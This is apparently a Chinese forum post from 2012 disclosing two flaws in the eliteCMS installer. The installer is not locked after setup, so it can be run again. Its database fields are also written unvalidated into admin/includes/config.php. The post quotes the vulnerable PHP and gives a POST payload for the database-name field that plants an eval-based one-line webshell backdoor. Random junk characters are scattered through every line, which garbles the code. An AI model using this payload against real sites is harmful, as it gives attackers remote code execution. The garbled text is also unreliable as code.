eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装; q, N, L, ^+ H# s- g
* } f2 z# m% G( ]2 O- |9 d
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
+ Y8 z* i! B1 S$ S' B我们来看代码:$ [+ y* ?5 q7 ^" Q
W5 A4 r( A9 r/ w/ M1 f...6 x/ |& X4 `( v. O% \: a) ]
elseif ($_GET['step'] == "4") {: k+ W. J- ]6 w0 P
$file = "../admin/includes/config.php";
+ U. B% s0 L! T! o! E9 z $write = "<?php\n";
* [7 o# j, v! _7 k5 \, }+ V! ^ $write .= "/**\n";* O, ?4 h9 x) g2 @
$write .= "*\n";- N" O7 [$ w$ r
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
+ S! U+ n1 E! e( o, d# c; z: ^...略...$ x, F) o2 r6 W
$write .= "*\n";) U5 G) X! \3 I- r
$write .= "*/\n";" {1 ?; K ]3 m
$write .= "\n";
( @) n& Q2 C4 H Q. T2 j5 c a% z $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
. W& b2 T/ j. p$ R $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";9 P" Y0 }- ]) s, Q0 \ i9 O
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
% b3 B5 j5 p+ P! A! X5 p2 N $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";8 O" w6 ~. d1 A! q
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";. ^# B( X7 {9 h$ U- Q9 x. R
$write .= "if (!\$connection) {\n";
& L" A) v4 [) h' W# f- e $write .= " die(\"Database connection failed\" .mysql_error());\n";. k; y" j7 D. g: h: h7 v
$write .= " \n";+ _& I, n7 l2 W% O ?
$write .= "} \n";
! T; k% s+ ]' A/ r! E2 q4 W! a( h $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
6 e: v5 s3 b; a w3 Y9 t5 w, f& b! S5 B" x $write .= "if (!\$db_select) {\n";5 x7 K+ X9 Z7 u, l
$write .= " die(\"Database select failed\" .mysql_error());\n";
. G. s: m" X6 K+ w) f5 ?6 ?; C $write .= " \n";
3 B5 z$ p/ s9 P9 K5 A: S: j $write .= "} \n";
R. ~" Q0 J" U/ r+ X, i0 O" ] $write .= "?>\n";
& v9 L5 G: U1 t5 Q. } 2 Z- C7 `: j; s$ J3 x
$writer = fopen($file, 'w');
0 W1 ?' a$ h" _5 [5 }0 @* N! Q" {...0 z5 e* Q2 l: F4 U/ r |
2 t2 d3 m2 [, U在看代码:3 g* U( K* a+ t- n& v: G! L* i. [4 K2 H, T
% c2 K7 V# ?$ w6 }) K# D) v$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
6 ^8 W( [" a# z. d% Z1 c$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
2 P8 `6 e& j* G$_SESSION['DB_USER'] = $_POST['DB_USER'];- e1 u! [* s' ]+ |7 g
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];. y) A, x. w# k, |+ K9 Y) ?4 ~
* [/ R m; @5 H9 q
取值未作任何验证+ O( Q K5 P0 W" u& E
如果将数据库名POST数据:
+ U3 Z9 M6 r4 \
" u5 A9 k# W) y$ D) M+ ]1 G"?><?php eval($_POST[c]);?><?php
' W+ X( n7 S1 f2 ^3 ] 3 n* H) L5 q ]7 B* H
将导致一句话后门写入/admin/includes/config.php
% _3 ^( k) i) j8 y; Z4 L7 Q |
发表于 2012-11-18 13:59:27
收藏
支持
反对